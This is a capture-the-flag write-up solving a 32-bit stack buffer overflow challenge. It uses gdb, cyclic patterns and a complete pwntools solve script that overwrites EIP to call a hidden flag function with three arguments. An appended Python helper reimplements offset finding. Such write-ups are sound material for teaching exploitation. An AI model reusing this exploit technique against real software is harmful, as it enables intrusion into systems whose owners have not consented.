We need to call the hidden `flag` function and pass it some parameters. I used Ghidra to take a look at the function.

So we need to pass it `0x1337`, `0x247`, and `0x12345678`.

Let's find the function using `gdb`:

`info func`

The function is at `0x08048576`.

Now let's find the offset:

`pattern create 200`

Pass the pattern to the program. We got the segfault at `0x6261616b`, let's use `pattern search` to find the offset.

Okay, so now we know the offset. Let's test to make sure we can control `EIP`:

`pi print('A'*140 + 'B'*4)`

Passing that to the program we see we get a segfault at `0x424242`. Perfect. We control `EIP`.

Let's build our payload. The structure of our payload is as follows:

`padding + flagfunc + 4 bytes for a return address + param1 + param2 + param3`

1. Padding
    1. `'A' * 140`, we found this earlier
2. Flag function address
    1. `p32(0x08048576)` - packing the address in little-endian format using pwntools
3. Four bytes for a return address
    1. `'B' * 4`, you can use whatever. It doesn't matter, it just needs to be four bytes
4. Parameter 1
    1. `p32(0x1337)` - first parameter that needs to be passed, packed in little-endian format using pwntools
5. Parameter 2
    1. `p32(0x247)` - second parameter that needs to be passed, packed in little-endian format using pwntools
6. Parameter 3
    1. `p32(0x12345678)` - third parameter that needs to be passed, packed in little-endian format using pwntools

My solve script:

```python
# import pwntools
from pwn import *

# create the process
p = process('./hidden_flag_function_with_args')

# attach it to gdb
gdb.attach(p)

# create the remote connection instead of a local process
# p = remote('458b4cea0dae8dff.247ctf.com', 50078)

# payload variables
padding = b'A' * 140
param3 = p32(0x12345678)
param2 = p32(0x247)
param1 = p32(0x1337)
funcloc = p32(0x08048576)

# payload: padding, address of flag(), fake return address, then the three arguments
payload = padding + funcloc + b'B' * 4 + param1 + param2 + param3

# receives the data the program spits out up to 'though:'
print(p.recvuntil(b'though:'))

# receives the newline character
p.recvline()

# sends the payload
p.sendline(payload)

# receives the flag
print(p.recvall())
```

---

Tags: #ctf #exploit_development #buffer_overflow #scripting #pwn
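The `pattern create` / `pattern search` step above works because the pattern is a de Bruijn sequence in which every 4-byte window is unique, so the value that lands in `EIP` identifies exactly one position in the input. The following is an added example, not part of the writeup, that reimplements both commands in plain Python (no gdb or pwntools) and reproduces the offset 140 from the crash value `0x6261616b`; the function names are my own.

```python
import struct


def de_bruijn(alphabet: str = "abcdefghijklmnopqrstuvwxyz", n: int = 4):
    """Yield the de Bruijn sequence B(k, n) over `alphabet` one character at a time.

    Standard Lyndon-word construction; it produces the same ordering as the
    gef/pwntools 'pattern create' output ("aaaabaaacaaad...").
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def pattern_create(length: int) -> bytes:
    """Equivalent of `pattern create <length>`: the first `length` bytes of the sequence."""
    out = []
    for ch in de_bruijn():
        if len(out) == length:
            break
        out.append(ch)
    return "".join(out).encode()


def pattern_offset(crash_value: int, length: int = 200) -> int:
    """Equivalent of `pattern search`: offset of the 4 bytes that were loaded into EIP.

    The register holds the bytes little-endian (0x6261616b is b"kaab" in memory),
    so pack the value back to its in-memory byte order before searching.
    """
    needle = struct.pack("<I", crash_value)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("crash value does not come from this pattern")
    return idx


if __name__ == "__main__":
    print(pattern_offset(0x6261616B))  # 140, the padding length used above
```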